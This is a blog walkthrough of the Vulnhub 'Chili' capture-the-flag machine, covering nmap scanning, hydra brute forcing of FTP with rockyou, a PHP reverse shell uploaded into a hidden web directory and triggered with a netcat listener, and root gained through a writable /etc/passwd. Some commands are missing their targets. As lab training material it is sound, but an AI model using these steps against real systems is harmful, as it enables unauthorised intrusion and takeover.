Vulnhub Walkthrough

Chili Vulnhub Walkthrough

In this article, we are going to solve another boot to root challenge called chili. this is an easy level box. this VM is hosted on the vulnhub server. you can download here this box

Network Scanning

Let’s discover the target IP address by using Nmap ping scan.

nmap -sn

In my case my target IP address is and our next step is to scanning all ports and running the services.

sudo nmap -A -p-

our scanning is complete and Nmap discovers two open ports 21/FTP and 80/HTTP running apache httpd server.


Let’s navigate the target IP address on the browser.


After checking page source and try some stenography trick but we couldn’t found anything useful. then we starting brute forcing on port 21 FTP using hydra tool.

hydra -l chili -P /usr/share/wordlists/rockyou.txt -t 64

It takes a minute and hydra discover a valid username and password for the FTP server let’s log in with FTP using these credentials.


Now we login we chili user we move the Apache home directory and we run the dir -a command and we found hidden directory .nano and our current user have full permission this directory here we put our php reverse shell.

cd /var/www/html
dir -a
cd .nano
put rshell.php

our shell is upload successfully but our shell hasn’t executed permission let’s change the permission our reverse shell.

dir -a
chmod 007 rshell.php

Now we start our net-cat listener and using the curl command we execute our reverse shell by navigating our reverse shell directory.

sudo nc -lvp 555
curl -v

Privilege Escalation

Privilege escalation of the machine very easy we have read-write permission of the passwd file. now first we generate a password hash for our new user and using the echo command we add our new user passwd file. and we switch the shell by using the su command.

more about Passwd file privilege Escalation you read the article.

ls -ls /etc/passwd
openssl passwd -6 -salt rahul password
su rahul

and we have a root shell target machine let’s move the /root directory and read our final flag proof.txt

cd /root
cat proof.txt

By Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View Archive